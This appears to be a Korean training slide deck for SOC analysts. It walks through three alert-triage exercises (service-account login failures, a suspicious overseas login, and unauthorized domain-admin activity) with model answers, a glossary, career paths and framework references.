서비스 계정의 로그인 실패 급증 → 비밀번호 변경 후 미반영 가능성을 항상 먼저 확인
단, 외부 IP 또는 비정상 시간대에서의 시도가 동반되면 재평가 필요
보강 설명실습 Case A에서 서비스 계정이 나옵니다. 서비스 계정은 사람이 아니라 시스템이나 애플리케이션이 사용하는 계정입니다. 일반 사용자 계정과 다른 특성을 가지므로 분석 관점도 달라야 합니다.
서비스 계정비밀번호 변경시스템 계정
판단 포인트
  • 서비스 계정·비밀번호 변경 같은 맥락 단서를 먼저 해석하기
  • 숫자만 보지 말고 계정·자산·시간대를 함께 보기
  • 정상 운영 변경 가능성을 항상 열어두기
추가 확인
  • 시스템 계정 여부를 직전 변경 이력과 함께 교차 확인하기
  • 동일 시간대의 인증·호스트·네트워크 로그 묶어 보기
  • 단서 사이에 모순이 있는지 끝까지 점검하기
권고 흐름
  • 초기 분류와 보류 사유를 함께 기록하기
  • 필요 시 L2·IR 에스컬레이션 기준을 명시하기
  • 조치 후 재발 방지 포인트까지 남기기
Case A. 로그인 실패 200회
숫자가 크다고 바로 공격은 아니다 — 패턴과 맥락을 함께 봐야 한다
실습 A
관측 정보
시간
08:58 ~ 09:02
대상 계정
svc_backup
로그인 실패
200회
출발지 IP
10.10.24.15 (내부 서버)
관련 메모
금일 08:50 서비스 계정 비밀번호 변경 작업 예정

판단 질문

① 이것은 Brute-force 공격인가?
② 정상 변경 작업에 따른 오류인가?
③ 추가로 무엇을 확인해야 하는가?
힌트: 서비스 계정 · 내부 IP · 변경 작업 예정
보강 설명이 케이스의 포인트는 횟수에만 끌려가지 않는 것입니다. 200회라는 숫자는 분명 커 보이지만, 대상이 서비스 계정이고 출발지가 내부 서버이며 직전 비밀번호 변경 작업 정보가 있습니다. 수치보다…
서비스 계정내부 IP변경 작업
판단 포인트
  • 서비스 계정·내부 IP 같은 맥락 단서를 먼저 해석하기
  • 숫자만 보지 말고 계정·자산·시간대를 함께 보기
  • 정상 운영 변경 가능성을 항상 열어두기
추가 확인
  • 변경 작업 여부를 직전 변경 이력과 함께 교차 확인하기
  • 동일 시간대의 인증·호스트·네트워크 로그 묶어 보기
  • 단서 사이에 모순이 있는지 끝까지 점검하기
권고 흐름
  • 초기 분류와 보류 사유를 함께 기록하기
  • 필요 시 L2·IR 에스컬레이션 기준을 명시하기
  • 조치 후 재발 방지 포인트까지 남기기
🤔 Case A — 개인 판단 시간
2분간 조용히 Fact·Reason·Check·Verdict·Action을 작성해 보세요
실습 A · 판단
✏️
개인 판단 작성 (2분)
판단 템플릿을 떠올리며 작성하세요
Fact
Reason
Check
Verdict
Action
보강 설명이 장면은 개인 판단을 적는 시간입니다. 단정적인 결론보다 가정과 불확실성을 함께 적는 연습이 중요합니다.
실습개인 판단Case
작성 팁
  • 판단을 단정하지 말고 가능성으로 표현하기
  • 정상/비정상 근거를 각각 한 줄씩 적기
  • 모호한 지점은 “추가 확인 필요”로 남기기
체크 순서
  • 계정·출발지·시간대·직전 변경 이력 확인
  • 동일 행위의 반복성·확산성·영향 범위 점검
  • 추가 로그가 왜 필요한지 이유까지 적기
공유 포인트
  • 왜 그렇게 봤는지 근거를 공개하기
  • 반대 의견이 생기는 지점을 기록하기
  • 조치 여부와 우선순위까지 이어서 정리하기
Case A. 해설 — 로그인 실패 200회
외부 공격보다 비밀번호 변경 후 설정 미반영 가능성이 높다
실습 A 해설

1차 판단

비밀번호 변경 후 서비스 설정 미반영 또는 작업 오류 가능성이 높음

근거:
  • 내부 서버에서 발생
  • 서비스 계정 대상
  • 직전 비밀번호 변경 작업 예정 정보 존재

추가 확인

  • 실제 변경 작업 수행 여부
  • 서비스/스케줄러 설정값 갱신 여부
  • 동일 시점 성공 로그인 여부
  • 다른 소스 IP에서도 동일 계정 실패?

권고 조치

  • IT 운영팀과 변경 이력 확인
  • 악성으로 단정하지 말고 모니터링 유지
  • 외부 IP 또는 성공 로그인 동반 시 재평가
보강 설명이럴 때 숙련된 분석가는 무조건 공격이라고 하지 않고, 변경 관리 맥락과 시스템 설정 문제 가능성을 먼저 검토합니다.
서비스 계정내부 IP변경 작업
판단 포인트
  • 서비스 계정·내부 IP 같은 맥락 단서를 먼저 해석하기
  • 숫자만 보지 말고 계정·자산·시간대를 함께 보기
  • 정상 운영 변경 가능성을 항상 열어두기
추가 확인
  • 변경 작업 여부를 직전 변경 이력과 함께 교차 확인하기
  • 동일 시간대의 인증·호스트·네트워크 로그 묶어 보기
  • 단서 사이에 모순이 있는지 끝까지 점검하기
권고 흐름
  • 초기 분류와 보류 사유를 함께 기록하기
  • 필요 시 L2·IR 에스컬레이션 기준을 명시하기
  • 조치 후 재발 방지 포인트까지 남기기
Case B. 해외 IP 로그인
지리 정보만으로 확정하지 말되, 사용자 맥락과 로그인 후 행위를 반드시 함께 봐야 한다
실습 B
관측 정보
시간
22:14
사용자
finance01
로그인 결과
성공
출발지 국가
Singapore
디바이스
신규 브라우저 세션
MFA
성공
직후 행위
12분 내 문서 340개 조회, 85개 다운로드
사용자 메모
현재 국내 근무, 출장 등록 없음

판단 질문

① 정상 해외 접속 가능성이 있는가?
② MFA 성공은 안전하다는 의미인가?
③ 이 케이스의 우선순위는?
"MFA 성공 = 안전"은 위험한 오해
세션 토큰 탈취, 피싱 자동 승인, MFA 우회 등 가능
MFA를 우회하는 실제 방법들
① Adversary-in-the-Middle (AiTM): 공격자가 피싱 사이트를 실제 로그인 페이지처럼 만들어, 피해자가 MFA 코드를 입력하면 실시간으로 공격자 세션에 반영. 피해자는 정상 로그인한 줄 알지만 공격자도 이미 로그인한 상태.
② MFA Fatigue (MFA 피로 공격): 공격자가 탈취한 비밀번호로 MFA 요청을 수십 번 보내, 피해자가 지쳐서 "승인" 버튼을 누르도록 유도. 이를 막으려면 넘버 매칭(Number Matching) 등 강화 MFA가 필요.
🤔 Case B — 개인 판단 시간
2분간 작성 후 짝 토론 3분
실습 B · 판단
✏️
개인 판단 작성 (2분)
  생각 포인트: MFA 성공은 정말 "안전"하다는 뜻인가?
보강 설명이 장면은 개인 판단을 적는 시간입니다. 단정적인 결론보다 가정과 불확실성을 함께 적는 연습이 중요합니다.
실습MFACase
작성 팁
  • 판단을 단정하지 말고 가능성으로 표현하기
  • 정상/비정상 근거를 각각 한 줄씩 적기
  • 모호한 지점은 “추가 확인 필요”로 남기기
체크 순서
  • 계정·출발지·시간대·직전 변경 이력 확인
  • 동일 행위의 반복성·확산성·영향 범위 점검
  • 추가 로그가 왜 필요한지 이유까지 적기
공유 포인트
  • 왜 그렇게 봤는지 근거를 공개하기
  • 반대 의견이 생기는 지점을 기록하기
  • 조치 여부와 우선순위까지 이어서 정리하기
Case B. 해설 — 해외 IP 로그인
계정 탈취 또는 세션 악용 가능성이 높아 즉시 L2/IR 검토 필요
실습 B 해설

1차 판단: HIGH

계정 탈취 또는 세션 악용 가능성 높음

근거:
  • 평소와 다른 국가
  • 신규 디바이스
  • 재무 계정이라는 민감도
  • 직후 대량 조회 및 다운로드
  • 출장/예외 정보 부재

추가 확인

  • Impossible travel 여부
  • VPN/프록시 출구 IP 여부
  • 사용자의 실제 로그인 여부 확인
  • 메일 규칙 생성, 비정상 권한 부여 여부

권고 조치

  • 사용자 확인
  • 세션 종료 및 비밀번호 재설정 검토
  • 다운로드 범위 조사
  • 동일 IP/세션의 타 계정 영향 확인
보강 설명재무 사용자가 밤 시간에 해외 신규 세션으로 들어와 대량 다운로드를 했다면, 우선순위는 상당히 높아집니다. 즉시 L2/IR 검토가 필요합니다.
신규 디바이스후속 행위대량 다운로드
판단 포인트
  • 신규 디바이스·후속 행위 같은 맥락 단서를 먼저 해석하기
  • 숫자만 보지 말고 계정·자산·시간대를 함께 보기
  • 정상 운영 변경 가능성을 항상 열어두기
추가 확인
  • 대량 다운로드 여부를 직전 변경 이력과 함께 교차 확인하기
  • 동일 시간대의 인증·호스트·네트워크 로그 묶어 보기
  • 단서 사이에 모순이 있는지 끝까지 점검하기
권고 흐름
  • 초기 분류와 보류 사유를 함께 기록하기
  • 필요 시 L2·IR 에스컬레이션 기준을 명시하기
  • 조치 후 재발 방지 포인트까지 남기기
Case C. 관리자 계정 사용
권한이 높은 계정의 비정상 사용은 작은 정황만으로도 높은 우선순위를 가진다
실습 C
관측 정보
시간
02:11
계정
domain_admin01
로그인 대상
Domain Controller
출발지 호스트
Helpdesk-PC-07
직후 행위 1
PowerShell 실행
직후 행위 2
신규 로컬 관리자 계정 2개 생성
직후 행위 3
원격 서비스 생성 흔적
변경 승인
없음

판단 질문

① 어떤 점이 가장 위험한가?
② 즉시 조치가 필요한가?
③ 어떤 팀을 우선 호출해야 하는가?
보강 설명이 케이스는 앞선 사례보다 훨씬 강한 Incident 신호를 가집니다. 관리자 계정이 핵심 서버에 비정상 시간대에 로그인했고, PowerShell 실행 후 새 관리자 계정을 만들었다면 이는…
관리자 계정핵심 자산비승인 행위
판단 포인트
  • 관리자 계정·핵심 자산 같은 맥락 단서를 먼저 해석하기
  • 숫자만 보지 말고 계정·자산·시간대를 함께 보기
  • 정상 운영 변경 가능성을 항상 열어두기
추가 확인
  • 비승인 행위 여부를 직전 변경 이력과 함께 교차 확인하기
  • 동일 시간대의 인증·호스트·네트워크 로그 묶어 보기
  • 단서 사이에 모순이 있는지 끝까지 점검하기
권고 흐름
  • 초기 분류와 보류 사유를 함께 기록하기
  • 필요 시 L2·IR 에스컬레이션 기준을 명시하기
  • 조치 후 재발 방지 포인트까지 남기기
🤔 Case C — 개인 판단 시간
2분간 작성 후 짝 토론 3분 — 이번에는 "속도"도 판단해야 합니다
실습 C · 판단
✏️
개인 판단 작성 (2분)
  추가 질문: "추가로 좀 더 봅시다"가 적절한가, 아니면 즉시 행동이 필요한가?
보강 설명이 장면은 개인 판단을 적는 시간입니다. 단정적인 결론보다 가정과 불확실성을 함께 적는 연습이 중요합니다.
실습즉시 대응Case
작성 팁
  • 판단을 단정하지 말고 가능성으로 표현하기
  • 정상/비정상 근거를 각각 한 줄씩 적기
  • 모호한 지점은 “추가 확인 필요”로 남기기
체크 순서
  • 계정·출발지·시간대·직전 변경 이력 확인
  • 동일 행위의 반복성·확산성·영향 범위 점검
  • 추가 로그가 왜 필요한지 이유까지 적기
공유 포인트
  • 왜 그렇게 봤는지 근거를 공개하기
  • 반대 의견이 생기는 지점을 기록하기
  • 조치 여부와 우선순위까지 이어서 정리하기
Case C. 해설 — 관리자 계정 사용
고위험 Incident 가능성 매우 높음 — 즉시 대응 필요
실습 C 해설

1차 판단: CRITICAL

고위험 Incident 가능성이 매우 높으며 즉시 대응이 필요

근거:
  • 관리자 계정
  • 핵심 자산(도메인 컨트롤러)
  • 비정상 시간대(02:11)
  • 승인되지 않은 호스트에서 로그인
  • 권한 확장/지속성 확보 후속 행위

즉시 권고 조치

  • 계정 즉시 통제
  • 출발지 호스트 격리
  • 관련 서버/로그 증적 보존
  • IR/CERT 즉시 호출
  • 확산 범위 스코핑 병행

추가 확인

  • 계정 사용자의 실제 작업 여부
  • 동일 계정의 다른 시스템 접근
  • 새 관리자 계정의 사용 흔적
  • EDR 프로세스 트리 / 자격증명 탈취
보강 설명이럴 때 SOC는 추가로 좀 더 봅시다가 아니라, 증거 보존과 확산 차단을 병행하는 방향으로 빠르게 움직여야 합니다. 계정, 호스트, 자산 중요도가 모두 높기 때문에 우선순위를 최상급으로 두는…
관리자 계정핵심 자산비승인 행위
판단 포인트
  • 관리자 계정·핵심 자산 같은 맥락 단서를 먼저 해석하기
  • 숫자만 보지 말고 계정·자산·시간대를 함께 보기
  • 정상 운영 변경 가능성을 항상 열어두기
추가 확인
  • 비승인 행위 여부를 직전 변경 이력과 함께 교차 확인하기
  • 동일 시간대의 인증·호스트·네트워크 로그 묶어 보기
  • 단서 사이에 모순이 있는지 끝까지 점검하기
권고 흐름
  • 초기 분류와 보류 사유를 함께 기록하기
  • 필요 시 L2·IR 에스컬레이션 기준을 명시하기
  • 조치 후 재발 방지 포인트까지 남기기
실습 종합 비교
같은 종류의 Alert도 맥락에 따라 판단이 완전히 달라진다
Part 6 · 종합
케이스핵심 사실맥락 단서1차 판단핵심 교훈
A 로그인 실패 200회 서비스 계정 · 내부 IP · 변경 작업 예정 모니터링 숫자보다 맥락이 중요
B 해외 IP 로그인 성공 재무계정 · 신규 디바이스 · 대량 다운로드 HIGH MFA 성공 ≠ 안전
C 관리자 계정 사용 DC · 새벽 · PowerShell · 계정 생성 · 무승인 CRITICAL 권한 높으면 작은 정황도 위험
"숫자보다 중요한 것은 맥락이고, 맥락보다 중요한 것은 근거를 남기는 것이다."
세 케이스 비교 — "어떤 정보가 판단을 바꿨는가?"
비교 항목 Case A (로그인 실패) Case B (해외 IP) Case C (관리자 계정)
판단을 바꾼 정보잠금 후 중단 여부 + 계정 소유자 존재출장/VPN 기록 + 이전 접속 패턴변경관리 기록 + 접근 시스템 범위
오탐 확정 조건자동화 도구 확인 + 이후 성공 없음본인 확인 + VPN 사용 기록변경관리 티켓 + 정상 시스템만 접근
에스컬레이션 기준Low — 자체 처리 가능Medium — 확인 후 판단High — 즉시 L2 에스컬레이션
MITRE ATT&CKT1110 (Brute Force)T1078 (Valid Accounts)T1078.002 + 측면이동 의심
💡 세 케이스 모두 "이상한 로그인"이라는 같은 출발점이었습니다. 컨텍스트 확보 여부가 L1 분석가의 역량을 결정합니다.
판단의 전환점은 어디였나?
각 케이스에서 판단을 결정적으로 바꾼 요소
Part 6 · 분석
A
첫 인상: 200회 실패 → 공격 같다!
전환점: 서비스 계정 + 내부 IP + 변경 작업 → 오류 가능성↑
B
첫 인상: MFA 성공 → 안전한가?
전환점: 후속 행위(대량 다운로드) + 출장 없음 → 탈취 의심↑
C
첫 인상: 관리자 로그인 → 정상 작업?
전환점: 새벽 + 무승인 + 계정 생성 → 즉시 대응 필요
  첫 인상과 최종 판단이 다를 수 있다 — 맥락을 확인하기 전에 결론을 내리지 말라
보강 설명세 케이스를 통해 SOC 분석의 핵심 판단 패턴을 정리합니다. 각 케이스에서 가장 큰 판단 전환점이 무엇이었는지 기억하세요.
판단 패턴전환점비교
설명 확장
  • 판단 패턴 관점에서 이 주제의 목적을 다시 설명하기
  • 전환점 관련 현장 장면을 함께 떠올리기
  • 정의보다 왜 필요한지부터 말해 보기
판단 포인트
  • 무슨 흔적을 보고 무엇을 결론내는지 구분하기
  • 추가 확인할 로그·담당자·시간축을 메모하기
  • 오탐 가능성과 리스크를 같이 적어 두기
학습 요소
  • 판단 패턴·전환점 핵심어를 한 문장으로 정리하기
  • 실제 예시 1개와 연결해 기억하기
  • 다음 슬라이드와 이어지는 질문을 스스로 만들기
🗣️ 전체 토론
각자의 판단을 공유하고, 다른 관점과 비교해 보세요
Part 6 · 토론
💬
전체 피드백 시간

토론 포인트

① 세 케이스 중 가장 판단하기 어려웠던 것은?
② 본인의 판단과 해설이 달랐던 부분은?
③ 실무에서 비슷한 상황을 만나면 무엇부터 할 것인가?
보강 설명서로 다른 판단을 비교하며 기준 차이를 확인하는 토론 구간입니다. 근거가 달라진 지점을 함께 말해 보세요.
토론공유전체
공유 방법
  • 자신의 결론보다 근거를 먼저 공개하기
  • 판단이 바뀐 지점과 이유를 분리해서 말하기
  • 불확실한 부분은 그대로 남겨 토론하기
비교 질문
  • 어떤 단서가 서로 다른 결론을 만들었는지
  • 추가로 보면 합의가 쉬워질 데이터가 무엇인지
  • 실무라면 누가 최종 판단을 맡을지
실무 연결
  • 회의 후 남길 문서화 포인트를 정리하기
  • 에스컬레이션 기준과 우선순위를 함께 묶기
  • 다음 유사 사례에서 재사용할 체크리스트 만들기
실습에서 배운 5가지 핵심 교훈
Alert를 볼 때 항상 떠올려야 할 판단 기준
Part 6 · 교훈
1️⃣
숫자에 끌려가지 말라
200회 실패가 공격이 아닐 수 있다 — 맥락을 먼저 확인
2️⃣
MFA 성공 ≠ 안전
세션 탈취, 피싱 자동 승인, MFA 피로 공격 등 우회 가능
3️⃣
로그인보다 "로그인 후 행위"가 더 중요
로그인 자체가 아니라 그 직후 무엇을 했는지가 핵심
4️⃣
권한이 높으면 작은 정황도 크다
관리자 계정의 이상 행위는 일반 계정과 다른 무게
5️⃣
근거를 반드시 남겨라
감이 아니라 Fact + Reason + Impact + Action
보강 설명앞선 슬라이드의 핵심을 회수해 기억에 남기는 구간입니다. 용어보다 역할과 흐름을 연결해 보세요.
교훈판단 기준실습에서
핵심 회수
  • 교훈·판단 기준 핵심어를 세 문장으로 압축해 보기
  • 정의보다 역할·가치·흐름을 연결해서 설명하기
  • 비슷한 개념과의 차이를 짧게 대비해 보기
실무 연결
  • 현업에서는 어떤 로그·도구·협업으로 보이는지 떠올리기
  • 판단이 필요한 순간과 비용을 함께 생각하기
  • 오탐과 과소판단이 만드는 리스크를 비교하기
복습 체크
  • 혼자 설명 가능한 핵심 용어 3개 고르기
  • 다음 모듈과 이어질 질문 1개 만들어 보기
  • 실무 문장으로 바꾸어 다시 써 보기
기억할 한 줄 멘트
SOC의 본질을 한 문장으로 담은 표현들
핵심 멘트
"SOC는 보안 장비를 보는 팀이 아니라, 보안 신호로 운영 판단을 만드는 팀입니다."
"로그는 사실이고, 분석은 해석이며, 대응은 결정입니다."
"좋은 Alert는 많이 울리는 Alert가 아니라, 다음 행동을 이끌어내는 Alert입니다."
"SIEM은 넓게 보고, EDR은 깊게 보고, SOAR는 빠르게 움직이게 합니다."
"숫자보다 중요한 것은 맥락입니다."
"좋은 SOC는 사건을 처리할 뿐 아니라, 다음 사건을 더 잘 잡도록 자신을 개선합니다."
보강 설명앞선 슬라이드의 핵심을 회수해 기억에 남기는 구간입니다. 용어보다 역할과 흐름을 연결해 보세요.
멘트명언기억할
핵심 회수
  • 멘트·명언 핵심어를 세 문장으로 압축해 보기
  • 정의보다 역할·가치·흐름을 연결해서 설명하기
  • 비슷한 개념과의 차이를 짧게 대비해 보기
실무 연결
  • 현업에서는 어떤 로그·도구·협업으로 보이는지 떠올리기
  • 판단이 필요한 순간과 비용을 함께 생각하기
  • 오탐과 과소판단이 만드는 리스크를 비교하기
복습 체크
  • 혼자 설명 가능한 핵심 용어 3개 고르기
  • 다음 모듈과 이어질 질문 1개 만들어 보기
  • 실무 문장으로 바꾸어 다시 써 보기
SOC 분석가의 황금률
현장에서 항상 기억해야 할 운영 원칙
핵심 원칙
① 결론부터 내리지 말라
먼저 사실을 확인하고, 맥락을 모은 뒤에 판단하라
② 숫자에 끌려가지 말라
200회 실패보다 "누가, 어디서, 왜"가 더 중요하다
③ 혼자 판단하지 말라
불확실하면 에스컬레이션하고, 근거를 함께 남겨라
④ 문서화를 습관으로
판단의 근거와 조치를 반드시 기록으로 남겨라
⑤ 속도가 필요하면 행동하라
관리자 계정, 핵심 자산이면 "더 볼까"보다 "먼저 막아라"
⑥ 개선을 멈추지 말라
같은 오탐이 반복되면 룰을 고치고, 같은 공격을 다시 놓치지 말라
황금률을 내일부터 적용하는 법
🔍 Alert 볼 때
  • 이벤트만 보지 말고 컨텍스트
  • "누가·언제·어디서·왜" 5분 안에
  • 모르면 에스컬레이션이 더 낫다
📝 문서화할 때
  • Fact → Reason → Impact → Action
  • "이상함" ✗ → "03:47 외부IP 200회" ✅
  • 동료가 즉시 이해할 수 있어야 함
🚀 성장할 때
  • 처리한 케이스에서 패턴 찾기
  • ATT&CK 기법 번호 조금씩 익히기
  • 오탐도 "왜"를 기록하면 실력
07
핵심 요약 및 마무리
오늘 배운 것들이 어떻게 연결되는지 한눈에
약 10분
전체 지식 지도 핵심 개념 다음 단계
오늘의 핵심만 남기면
SOC의 본질은 로그를 많이 보는 것이 아니라, 빠르게 의미를 만들고 대응을 연결하는 것
요약
1
SOC는 탐지/분석/판단/대응 연결 조직이다
2
모든 Alert가 Incident는 아니다
3
좋은 분석은 Fact + Reason + Impact + Action으로 쓴다
4
SIEM / EDR / IDS·IPS / SOAR는 서로 다른 시야와 역할을 가진다
5
공격은 체인으로 보며, 분석은 타임라인으로 재구성한다
"로그는 사실이고, Alert는 가설이며, Incident는 대응이 필요한 운영 결론이다."
보강 설명앞선 슬라이드의 핵심을 회수해 기억에 남기는 구간입니다. 용어보다 역할과 흐름을 연결해 보세요.
탐지판단대응
핵심 회수
  • 탐지·판단 핵심어를 세 문장으로 압축해 보기
  • 정의보다 역할·가치·흐름을 연결해서 설명하기
  • 비슷한 개념과의 차이를 짧게 대비해 보기
실무 연결
  • 현업에서는 어떤 로그·도구·협업으로 보이는지 떠올리기
  • 판단이 필요한 순간과 비용을 함께 생각하기
  • 오탐과 과소판단이 만드는 리스크를 비교하기
복습 체크
  • 혼자 설명 가능한 핵심 용어 3개 고르기
  • 다음 모듈과 이어질 질문 1개 만들어 보기
  • 실무 문장으로 바꾸어 다시 써 보기
수강 후 자기 점검
이 4가지를 할 수 있으면 오늘의 목표를 달성한 것입니다
자기 점검
SOC를 한 문장으로 설명할 수 있다
"사람+프로세스+기술로 보안 이벤트를
모니터링·판단·대응하는 운영 조직"
Log·Event·Alert·Incident를 구분할 수 있다
"Log는 사실, Alert는 가설,
Incident는 대응이 필요한 결론"
SIEM·EDR·IDS/IPS·SOAR를 설명할 수 있다
"넓게·깊게·네트워크를·빠르게"
Alert에 대해 근거 기반 판단문을 작성할 수 있다
"Fact + Reason + Impact + Action"
보강 설명앞선 슬라이드의 핵심을 회수해 기억에 남기는 구간입니다. 용어보다 역할과 흐름을 연결해 보세요.
자기 점검학습 목표수강
핵심 회수
  • 자기 점검·학습 목표 핵심어를 세 문장으로 압축해 보기
  • 정의보다 역할·가치·흐름을 연결해서 설명하기
  • 비슷한 개념과의 차이를 짧게 대비해 보기
실무 연결
  • 현업에서는 어떤 로그·도구·협업으로 보이는지 떠올리기
  • 판단이 필요한 순간과 비용을 함께 생각하기
  • 오탐과 과소판단이 만드는 리스크를 비교하기
복습 체크
  • 혼자 설명 가능한 핵심 용어 3개 고르기
  • 다음 모듈과 이어질 질문 1개 만들어 보기
  • 실무 문장으로 바꾸어 다시 써 보기
다음에 배울 내용 미리보기
Module 2에서는 오늘의 개념을 실제 도구 위에서 연습합니다
Next
오늘 Module 1. SOC 개요
  • SOC 정의와 역할
  • 운영 구조 (L1~IR)
  • 이벤트 흐름과 판단
  • 보안 도구 이해
  • 시나리오 + 실습
다음 Module 2. 로그 분석 실습
  • 실제 SIEM 화면 탐색
  • 로그 검색 쿼리 작성
  • Alert 분석 실습 (고급)
  • 상관분석 룰 이해
  • 보고서 작성 실습
오늘 배운 판단 프레임워크(Fact + Reason + Impact + Action)는 다음 모듈에서도 계속 사용합니다
보강 설명앞선 슬라이드의 핵심을 회수해 기억에 남기는 구간입니다. 용어보다 역할과 흐름을 연결해 보세요.
다음 모듈SIEM실습
핵심 회수
  • 다음 모듈·SIEM 핵심어를 세 문장으로 압축해 보기
  • 정의보다 역할·가치·흐름을 연결해서 설명하기
  • 비슷한 개념과의 차이를 짧게 대비해 보기
실무 연결
  • 현업에서는 어떤 로그·도구·협업으로 보이는지 떠올리기
  • 판단이 필요한 순간과 비용을 함께 생각하기
  • 오탐과 과소판단이 만드는 리스크를 비교하기
복습 체크
  • 혼자 설명 가능한 핵심 용어 3개 고르기
  • 다음 모듈과 이어질 질문 1개 만들어 보기
  • 실무 문장으로 바꾸어 다시 써 보기
딱 세 가지만 기억하세요
요약
1
SOC는 탐지와 대응의
운영 조직이다
2
모든 Alert는
조사와 맥락 확인을 거쳐야 한다
3
좋은 분석가는
근거와 다음 행동을 함께 남긴다
보강 설명앞선 슬라이드의 핵심을 회수해 기억에 남기는 구간입니다. 용어보다 역할과 흐름을 연결해 보세요.
핵심 3기억가지만
핵심 회수
  • 핵심 3·기억 핵심어를 세 문장으로 압축해 보기
  • 정의보다 역할·가치·흐름을 연결해서 설명하기
  • 비슷한 개념과의 차이를 짧게 대비해 보기
실무 연결
  • 현업에서는 어떤 로그·도구·협업으로 보이는지 떠올리기
  • 판단이 필요한 순간과 비용을 함께 생각하기
  • 오탐과 과소판단이 만드는 리스크를 비교하기
복습 체크
  • 혼자 설명 가능한 핵심 용어 3개 고르기
  • 다음 모듈과 이어질 질문 1개 만들어 보기
  • 실무 문장으로 바꾸어 다시 써 보기
핵심 용어 정리 (Glossary)
오늘 배운 용어들 — 다음 모듈에서도 계속 사용됩니다
부록
용어정의핵심 포인트
SOCSecurity Operations Center사람+프로세스+기술의 운영 체계
Log시스템이 남긴 원시 기록사실 그 자체
Event의미를 해석한 단위 행위맥락이 부여된 기록
Alert탐지 로직이 주의를 요구한 상태가설 — 반드시 검증 필요
Incident실제 대응이 필요한 보안 사건운영 결론
SIEMSecurity Information & Event Management넓게 본다 (전체 인프라)
EDREndpoint Detection & Response깊게 본다 (호스트 내부)
SOARSecurity Orchestration, Automation & Response빠르게 움직인다 (자동화)
MTTDMean Time To Detect탐지까지 걸리는 평균 시간
MTTRMean Time To Respond대응까지 걸리는 평균 시간
IOCIndicator of Compromise침해 발생 흔적 (IP, 해시 등)
TriageAlert 1차 분류 과정빠르고 일관된 판단
헷갈리는 개념 쌍 — 이렇게 기억하세요
Event vs Alert
이벤트 = 도서관의 모든 책 기록         Alert = 사서가 꺼내 놓은 의심 책
"Alert는 Event 중에서 이상한 것"
False Positive vs False Negative
FP = 경보 울렸는데 불이 없음 (오탐)         FN = 불 났는데 경보 안 울림 (미탐)
"FN이 FP보다 훨씬 위험하다"
MTTD vs MTTR
MTTD = 화재 발생부터 발견까지         MTTR = 발견 후 진화 완료까지
"Detect(발견) → Respond(대응)"
IOC vs TTP
IOC = 범죄 현장의 지문·족적 (과거 증거)         TTP = 범인의 수법·행동 습관 (패턴)
"IOC는 과거용, TTP는 미래 예측용"
SOC 관련 커리어 경로
오늘 배운 내용은 이 모든 경로의 출발점
부록
🔍 SOC Analyst (L1→L2→L3)
Alert 분석 → 조사 → 탐지 설계
🚨 Incident Responder / DFIR
침해 사고 대응 · 포렌식 · 복구
🎯 Threat Hunter
능동적 위협 탐색 · ATT&CK 매핑
⚙️ Detection Engineer
탐지 룰 개발 · SIEM 엔지니어링
🌐 Threat Intelligence Analyst
위협 정보 수집 · IOC 분석 · 보고
🏗️ Security Architect / SOC Manager
보안 전략 수립 · SOC 운영 관리
모든 경로의 공통 출발점: Log를 읽고, Alert를 분류하고, 근거 기반 판단을 작성하는 능력
각 직무로 가는 현실적인 경로
🔍 L1 → L2 → L3 분석가 경로
L1으로 시작해 Alert 판단 경험을 쌓고, L2로 승급해 상세 조사 능력을 키운 후, 3~5년 후 위협 헌팅과 룰 개발을 담당하는 L3로 성장. 기술 깊이가 핵심.
🚨 IR/포렌식 전문가 경로
L2에서 Incident 처리 경험을 충분히 쌓은 후, 포렌식 자격증(GCFE, GCFA 등)과 함께 IR 전문가로. 사고 대응 현장 경험이 필수. 변호사·검찰 디지털 포렌식팀과 협업도 함.
⚙️ Detection Engineer 경로
SIEM 쿼리 작성, 탐지 룰 개발에 흥미가 있다면. 프로그래밍(Python, SPL, KQL 등)과 ATT&CK 매핑 능력이 중요. "더 좋은 경보기를 만드는 사람"이다.
🌐 위협 인텔리전스 분석가 경로
IOC 분석, 위협 그룹 추적, 보고서 작성에 관심이 있다면. OSINT 능력과 외국어(주로 영어) 활용 능력이 중요. "적을 연구하는 사람"이다.
커리어 Q&A — 입문자가 가장 자주 묻는 질문
Q: 비전공자도 SOC 분석가가 될 수 있나요?
A: 충분히 가능합니다. 중요한 것은 체크리스트 꼼꼼함, 문서화 습관, 빠른 정보 처리입니다. 리눅스 커맨드·로그 읽기 같은 기술은 학습으로 채울 수 있습니다.
Q: L1 → L2로 올라가려면 얼마나 걸리나요?
A: 평균 1~2년입니다. 케이스 처리 수·에스컬레이션 정확도·네트워크 지식이 기준입니다. TryHackMe·HackTheBox 병행 학습으로 6~12개월로 단축도 가능합니다.
Q: 취업에 도움이 되는 자격증은?
A: 입문: CompTIA Security+ (국제 인정 기본). 실무: BTL1 (Blue Team Labs, L1~L2용). 한국에서는 정보보안기사도 많이 요구됩니다.
참고 프레임워크 및 출처
본 모듈의 개념 정합성 검증에 참고한 공식 자료
부록

NIST CSF 2.0

Govern · Identify · Protect · Detect · Respond · Recover

NIST SP 800-61r3

Incident Response를 사이버 리스크 관리의 일부로 설명

MITRE ATT&CK

Tactic은 "왜", Technique은 "어떻게" — 공격 행위 구조화

Google SecOps

SIEM/SOAR 운영 관점의 개념 표현 참고

Microsoft Security 101

비전공자 대상 EDR/SIEM/SOAR 정의 참고

Verizon 2025 DBIR

최근 위협 동향 사례 및 통계 참고

각 프레임워크를 실무에서 어떻게 활용하는가
NIST CSF 2.0
보안 프로그램 전체 설계 기준. "우리 조직의 탐지(Detect) 능력이 충분한가?"를 평가할 때 사용. SOC는 주로 Detect · Respond · Recover 기능을 담당한다.
MITRE ATT&CK
실제 공격 기법의 백과사전. SOC에서는 "우리가 탐지 못하는 Technique이 무엇인가"를 파악하고, 그에 맞는 룰을 만들 때 활용한다. SIEM 탐지 룰 이름에 T1059.001처럼 ID를 붙이는 것이 관례다.
Verizon DBIR
매년 발간되는 실제 침해 사례 보고서. "올해 가장 많이 쓰인 공격 방법이 무엇인가"를 확인해 SOC의 탐지 우선순위를 현실에 맞게 조정하는 데 활용한다.
🎓
감사합니다
질의응답 및 다음 모듈 안내
Module 1 완료
SOC 개요 (4H)
Next →
실제 로그 분석 실습
📌 오늘의 핵심 3
① SOC = 빠른 발견 + 근거 있는 판단
② Log(사실) → Alert(가설) → Incident(결론)
③ 로그보다 맥락(Context)이 판단을 바꾼다
🛠️ 오늘 익힌 도구
SIEM (넓게 본다)
EDR (깊게 본다)
SOAR (빠르게 자동화)
IDS/IPS (네트워크 감시)
✏️ 판단문 공식
Fact (관측 사실) +
Reason (왜 의심) +
Impact (영향 범위) +
Action (권고 조치)
